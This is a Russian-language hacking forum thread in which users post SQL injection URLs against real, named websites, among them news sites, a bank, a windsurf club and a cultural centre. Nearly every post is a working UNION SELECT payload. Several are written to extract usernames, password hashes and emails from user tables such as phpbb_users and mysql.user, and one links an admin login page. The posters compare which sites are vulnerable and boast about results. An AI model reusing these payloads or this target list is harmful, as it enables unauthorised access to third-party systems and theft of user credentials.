SQL Инъекции

Уже было, в этом же скрипте.

_____

Code:

http://dewerelddraaitdoor.vara.nl/nieuws_laatste.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

 

и-в жопу.
http://www.clasp.org/publications.php?id=-16+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15/*

 

Тоже было и тоже в этом скрипте...
+++
Скуля:

Code:

http://director-online.com/buildArticle.php?id=-1+union+select+1,2,3,4,5,6,7,8+from+user/*

 

Моё кунг-фу сильнее твоего

Code:

http://www.clasp.org/publications.php?id=-16+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15+from+user/*

 

А еще лучше так:

http://www.clasp.org/publications.php?id=-1+union+select+1,2,concat(username,char(58),password),4,5,6,6,8,9,10,11,12,13,14,15+from+user/*

И админка:

http://www.clasp.org/admin/login.php

 

http://www.mooreindhardware.com/products.php?id=-2+union+select+1,2,version()

 

И сново повтор .
===
Скуля:

Code:

http://www.chicagomediaaction.org/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*

 

что то мне подсказывает что там нет скули

 

Точно, замучался подбирая так и не нашел =(

100%, проверял и не один раз, и вот еще одна там же

Code:

http://www.mercedes-benz.ru/faq/?type=sql-inj

 

http://www.karlcore.com/articles/article.php?id=-6+union+select+1,2,3,4,5,6

colkru идёт на***!!!

 

И почему сруз на*** (кстати эта скуля тоже была)
Смотри тут я начал собирать лист всех скулей выложеных в этой теме(для себя), пока там до 53 стр., 86,87. Так что можеш юзать нажатием клавиши
ctrl+F. Потом дам лист (если хочеш) со всеми скулями(чтобы не было повторов).
.
p.s. сорри за офтоп.
Скуля:

Code:

http://texte.ruprecht.de/zeigartikel.php?id=-1+union+select+1,convert(version()+using+latin1),3,4,5,6,7,8,9,10,11/*

 

http://www.dvdfuture.com/features.php?id=-7+union+select+version(),2,3,4,5,6,7/*

PS
если colkru 3.14здить всякий бред - то я его встречу когда он пойдёт на гитару.

 

Лучше так:

PHP:

http://www.dvdfuture.com/features.php?id=-7+union+select+1,2,concat(username,char(58),user_password),4,5,6,7+from+phpbb_users+limit+1,1/*

 

www.avtozazbank.com

Code:

http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*

 

Code:

http://www.mishijos.cl/servicios/sabiasque.php?id=-11+union+select+1,concat(user_password,char(58),username)+from+users/*

Code:

http://basic.forumservice.nl/lees.php?id=1&mid=-41+union+select+1,2,3,4,concat(password,0x3a,user),6,7,8+from+mysql.user/*

Code:

 http://www.jongerenclub.nl/news.php?action=comments&id=-65+union+select+1,2,concat(username,0x3a,email,0x3a,pass,0x3a,id),4,5,6+from+users/* 

 

Code:

http://www.windsurf.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version()/*

 

http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,concat(user_name,char(58),user_pass),9+from+users/*

 

да там ведь и форум бажный.. UBB хех)

Code:

http://www.windsurf.ru/board/showflat.php?Board=club&Number=-1+union+select+1,2,3,concat(id,0x3a,login,0x3a,email),5,6,7+from+members+limit+0,1/*

столбик с паролем не подобрал тока login && email

 

http://www.jigsawpuzzleplayer.com/pack.php?id=-7+union+select+1,2,version(),4,5,6,7

 

http://www.bozar.be/activity.php?id=-1+union+select+1,2,concat(name,char(58),password),4,5,6,7,8,9,10,11,concat(name,char(58),password),13,14,15,16+from+users+limit+0,1/*

Пасс админа зашифрован(((